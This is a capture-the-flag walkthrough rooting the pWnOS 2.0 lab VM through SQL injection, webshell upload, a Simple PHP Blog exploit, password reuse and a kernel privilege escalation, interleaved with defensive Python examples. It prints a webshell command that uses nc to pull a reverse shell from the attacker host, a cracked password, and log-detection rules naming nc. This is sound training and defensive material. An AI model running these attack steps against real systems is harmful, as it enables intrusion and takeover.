pWnOS 2 is a boot2root virtual machine designed for students to practice vulnerability analysis and exploitation. The objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise.
- VMware Workstation for the virtual machines
- Kali Linux VM custom network with subnet 10.10.10.1/24 range
- pWnOS 2.0 VM custom network with subnet 10.10.10.1/24. Static IP address of pWnOS 2.0 is 10.10.10.100
Kali Linux network settings
pwnOS network settings
- Kali Linux VM
- SQL injection
- Shell upload via SQL injection, database misconfiguration.
- System misconfiguration, reuse of the root password.
- Linux Kernel 2.6.32 < 3.x (CentOS 5/6) – ‘PERF_EVENTS’ Local Privilege Escalation
Target VM IP Address: 10.10.10.100
#nmap -p- -A -oX nmap-pwnOS2.xml --webxml 10.10.10.100
- Target OS is between Linux 2.6.32 – 2.6.39
- OpenSSH 5.8p1 is installed on port 22
- Apache httpd 2.2.17 is installed on port 80
Exploit path 1 for shell: SQL Injection
Let's explore the website in a browser.
Login page; let's check for SQL injection.
See! We found SQL injection. Also note down the absolute path of the website on the server, ‘/var/www/login.php’. Using SQL injection, we can try uploading a webshell using this disclosed local path.
Now it's time for Burp Suite to exploit the SQL injection.
After database enumeration, we found:
Columns of the user table: user_id, first_name, last_name, email, pass, user_level, active
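The login-form bug found above is the classic string-concatenated query. As an added example (not code from the write-up or from pWnOS), here is a Python stand-in for that PHP login against an in-memory SQLite copy of the enumerated user table, with the vulnerable query next to its parameterised fix. The rows, passwords and the unsalted SHA-1 storage scheme are constructed assumptions for the demo; the write-up does not state the real hash type, only that a lookup site returned the cleartext.

```python
import hashlib
import sqlite3


def make_db():
    """In-memory copy of the enumerated 'users' table with constructed demo rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, email TEXT UNIQUE, pass TEXT, user_level INTEGER, active INTEGER)"
    )
    # Constructed accounts, not the VM's data. Unsalted SHA-1 is an assumed
    # scheme, chosen to show why a public hash lookup could return the cleartext.
    rows = [
        (1, "Dan", "Demo", "dan@example.org", hashlib.sha1(b"demo-pass-1").hexdigest(), 1, 1),
        (2, "Ann", "Demo", "ann@example.org", hashlib.sha1(b"demo-pass-2").hexdigest(), 0, 1),
        (3, "Old", "Demo", "old@example.org", hashlib.sha1(b"demo-pass-3").hexdigest(), 0, 0),
    ]
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?, ?, ?)", rows)
    conn.commit()
    return conn


def vulnerable_login(conn, email, password):
    """The bug class on the box: form values are pasted into the SQL text, so a
    quote in `email` closes the string literal and rewrites the WHERE clause."""
    pw_hash = hashlib.sha1(password.encode()).hexdigest()
    sql = ("SELECT user_id, email, user_level FROM users "
           f"WHERE email = '{email}' AND pass = '{pw_hash}' AND active = 1")
    return conn.execute(sql).fetchone()


def hardened_login(conn, email, password):
    """Fix: bind the values as parameters; the driver never parses them as SQL."""
    pw_hash = hashlib.sha1(password.encode()).hexdigest()
    sql = ("SELECT user_id, email, user_level FROM users "
           "WHERE email = ? AND pass = ? AND active = 1")
    return conn.execute(sql, (email, pw_hash)).fetchone()


def demo():
    """Run a legitimate login and a classic probe string through both versions."""
    conn = make_db()
    probe = "' OR 1=1 --"
    return {
        "legit_vuln": vulnerable_login(conn, "dan@example.org", "demo-pass-1"),
        "legit_hard": hardened_login(conn, "dan@example.org", "demo-pass-1"),
        "probe_vuln": vulnerable_login(conn, probe, "anything"),
        "probe_hard": hardened_login(conn, probe, "anything"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:11s} -> {row}")
```

With the probe string the vulnerable version returns the first active row (the level-1 account) without any valid password, while the parameterised version returns nothing; both accept the genuine credentials. Replacing the fast unsalted hash with a slow salted KDF is the second half of the fix, since that is what made the recovered hash crackable by lookup.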
Let's crack the hash for Dan, and guess what, I found the cleartext password for the given hash at hashkiller.co.uk. The cleartext password is killerbeesareflying.
After logging in with firstname.lastname@example.org:killerbeesareflying there is nothing much we can do except see a WAF warning message.
Let's analyse further to find another way. We can read local files. So there is a user named dan on the local machine.
Let's upload a shell using SQL injection.
Confirm that the webshell was uploaded successfully. Confirming in Burp Suite.
Confirming the shell is uploaded in the browser.
Yes! The webshell is uploaded successfully.
Next step: find a writable directory on the server. After exploring, I found the /var/www/blog/config directory writable by www-data.
Time to get an interactive shell. Let's see if nc is available on the server.
nc is available.
Let's upload php-reverse-shell.php by pentestmonkey. You can find this webshell in Kali Linux at /usr/share/webshells/php/php-reverse-shell.php
Configuring ip:port to point at the Kali Linux attacking machine.
Transfer the reverse shell to the target VM.
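A directory under the web root that the web-server account can write to, combined with PHP execution in that directory, is what turns the command-injection foothold into a persistent shell drop. As an added example (not part of the write-up), here is a small audit that lists such directories. The constructed records model the target's layout; the numeric id 33 for www-data and the permission modes are assumptions, since the write-up only says /var/www/blog/config was writable by www-data.

```python
import os
import stat
from dataclasses import dataclass


@dataclass
class DirRecord:
    path: str
    mode: int   # permission bits only (stat.S_IMODE)
    uid: int
    gid: int


def can_create_files(rec, uid, gids):
    """Creating a file in a directory needs both write and search (x) permission
    for the one class the account falls into: owner, then group, then other."""
    if rec.uid == uid:
        return bool(rec.mode & stat.S_IWUSR and rec.mode & stat.S_IXUSR)
    if rec.gid in gids:
        return bool(rec.mode & stat.S_IWGRP and rec.mode & stat.S_IXGRP)
    return bool(rec.mode & stat.S_IWOTH and rec.mode & stat.S_IXOTH)


def find_writable_dirs(records, uid, gids):
    """Paths the given account could drop a file into, sorted for stable output."""
    return sorted(r.path for r in records if can_create_files(r, uid, gids))


def collect_dirs(root):
    """Walk a real web root into DirRecords (used when run on a host)."""
    out = []
    for dirpath, _dirnames, _files in os.walk(root):
        st = os.lstat(dirpath)
        out.append(DirRecord(dirpath, stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid))
    return out


# Constructed records modelled on the target's layout (assumed modes and ids).
WWW_DATA = 33  # www-data uid/gid on Debian-derived systems; assumption
SAMPLE = [
    DirRecord("/var/www", 0o755, 0, 0),
    DirRecord("/var/www/blog", 0o755, 0, 0),
    DirRecord("/var/www/blog/config", 0o777, 0, 0),         # world-writable
    DirRecord("/var/www/blog/images", 0o775, 0, WWW_DATA),  # group-writable by www-data
    DirRecord("/var/www/blog/cache", 0o766, 0, 0),          # write bit set but no search bit
    DirRecord("/var/www/includes", 0o750, 0, 0),
]


def audit(records=SAMPLE, uid=WWW_DATA, gids=frozenset({WWW_DATA})):
    return find_writable_dirs(records, uid, gids)


if __name__ == "__main__":
    import sys
    recs = collect_dirs(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE
    for p in audit(recs):
        print("web account can write:", p)
```

Run with a path argument it audits a real tree; without one it uses the constructed records. The 0o766 cache entry shows the edge case the check handles: a write bit alone is not enough without search permission. The fix on a box like this is to keep the web root owned by root with mode 755 and, where an application genuinely needs a writable directory, to disable script execution there (for example `php_admin_flag engine off` in that directory's Apache configuration when using mod_php).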
http://10.10.10.100/shell7.php?cmd=nc 10.10.10.128 8888 > /var/www/blog/config/rshell.php&
Confirm that rshell is uploaded.
Listening for the php-reverse-shell netcat connection.
Open rshell in the browser to execute the shell.
And we got a shell.
Break out of the jail shell.
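Every step of this path leaves a trace in the Apache access log: a `cmd=` parameter on a PHP page, an `nc` invocation inside a query string, and a PHP file being served from the blog's config directory. As an added example (not part of the write-up), here is detection logic that runs those three rules over constructed log lines modelled on the requests above. The list of parameter names and of directories that should never serve PHP are assumed policy; extend them for a real site.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log: client ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

SUSPECT_PARAMS = {"cmd"}                     # parameter used by the shell in the write-up
NO_PHP_DIRS = ("/blog/config/",)              # directories that should never serve PHP (assumed)
SHELL_TOOL_RE = re.compile(r"(?:^|[^\w])nc\s")  # 'nc <host> <port>' inside a decoded value


def parse_line(line):
    """Return the fields we need from one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "client": m.group("client"),
        "path": parts.path,
        "query": parse_qs(parts.query, keep_blank_values=True),  # percent-decoded values
        "status": int(m.group("status")),
    }


def rules_for(entry):
    """Names of the rules a parsed request trips, in a fixed order."""
    hits = []
    if SUSPECT_PARAMS.intersection(entry["query"]):
        hits.append("cmd_param")
    if entry["path"].endswith(".php") and entry["path"].startswith(NO_PHP_DIRS):
        hits.append("php_in_config_dir")
    if any(SHELL_TOOL_RE.search(v) for vals in entry["query"].values() for v in vals):
        hits.append("shell_tool_in_query")
    return hits


def detect(lines):
    """Scan log lines and return one finding per flagged request."""
    findings = []
    for n, line in enumerate(lines, 1):
        entry = parse_line(line)
        if entry is None:
            continue
        hits = rules_for(entry)
        if hits:
            findings.append({"line": n, "client": entry["client"],
                             "path": entry["path"], "rules": hits})
    return findings


# Constructed log lines modelled on the write-up's requests (not a real capture).
SAMPLE_LOG = """\
10.10.10.128 - - [01/Jan/2024:10:00:01 +0000] "GET /login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.10.128 - - [01/Jan/2024:10:00:09 +0000] "POST /login.php HTTP/1.1" 200 1611 "-" "Mozilla/5.0"
10.10.10.128 - - [01/Jan/2024:10:00:30 +0000] "GET /shell7.php?cmd=id HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.10.10.128 - - [01/Jan/2024:10:00:45 +0000] "GET /shell7.php?cmd=nc%2010.10.10.128%208888%20%3E%20/var/www/blog/config/rshell.php%26 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.10.128 - - [01/Jan/2024:10:01:10 +0000] "GET /blog/config/rshell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.10.50 - - [01/Jan/2024:10:02:00 +0000] "GET /blog/index.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
""".splitlines()


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} {f['path']} -> {', '.join(f['rules'])}")
```

The values are decoded before matching, so the percent-encoded `nc` command on the fourth line is still caught. Lines one, two and six are ordinary traffic and produce no finding; a real deployment would also correlate the `cmd=` hits with the PHP file's creation time to get the full chain.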
Exploit path 2 for Shell: Exploiting multiple vulnerabilities in Simple PHP Blog
Let's check for other directories on the server with dirb.
With nikto, we found a directory “blog”
This is “Simple PHP Blog 0.4.0”.
Let's google for any available exploit for “Simple PHP Blog 0.4.0”.
Exploit link: https://www.exploit-db.com/exploits/1191/
Or use searchsploit to find the exploit for Simple PHP Blog.
Let's try the Multiple Remote exploit.
Let's upload cmd.php.
./sphpblog.pl -h http://10.10.10.100/blog -e 1
Let's explore the shell in the browser.
We can execute commands. Again, we can upload a reverse shell in PHP and get an interactive shell with nc as we did above. I am not going to repeat the same steps. Let's go for privilege escalation.
Privilege Escalation 1: Misconfiguration
We found the DB root username and password in the mysqli_connect.php file in the /var/ directory.
Let's reuse these credentials for SSH.
Congrats! We are root!
Privilege Escalation 2: Kernel exploit
Let's check the kernel version.
There is a perf_events exploit for this kernel that works.
I uploaded this exploit using nc. Now, let's try this exploit.
Congrats! We are root!
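The second escalation only works because the kernel falls inside the range listed at the top of the write-up. As an added example (not part of the write-up), here is a check that parses a `uname -r` string and reports which listed ranges contain it, so a fleet can be screened for the same exposure. The upper bound reproduces the page's "< 3.x" wording rather than a specific fixed build, so a hit means "compare against the distribution's advisory", not "confirmed vulnerable".

```python
import platform
import re

# (name, inclusive lower bound, exclusive upper bound) as the write-up lists it.
LISTED_RANGES = [
    ("perf_events local privilege escalation (listed range 2.6.32 < 3.x)",
     (2, 6, 32), (4, 0, 0)),  # upper bound follows the page's wording, not a patch build
]

RELEASE_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_kernel_release(release):
    """Turn a `uname -r` string such as '2.6.35-22-generic' into (2, 6, 35).
    Distro suffixes ('-22-generic', '-4-686-pae') are ignored; a missing
    patch level is treated as 0."""
    m = RELEASE_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def matching_ranges(release, ranges=LISTED_RANGES):
    """Names of the listed ranges that contain this kernel (lo <= version < hi)."""
    v = parse_kernel_release(release)
    return [name for name, lo, hi in ranges if lo <= v < hi]


def check_host():
    """Run the check against the kernel this script is executing on."""
    rel = platform.release()
    return rel, matching_ranges(rel)


if __name__ == "__main__":
    rel, hits = check_host()
    print(f"kernel {rel}: " + (", ".join(hits) if hits else "no listed range matched"))
```

Tuple comparison gives the right ordering for versions with different patch levels, which a plain string compare would get wrong (for example "2.6.9" versus "2.6.32"). The only durable fix for a kernel in the listed range is a vendor kernel update; reusing the MySQL root password for the system root account, as the first escalation showed, should be treated as its own finding regardless of kernel version.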
This is a great Boot2Root VM. I learned and enjoyed a lot rooting this VM.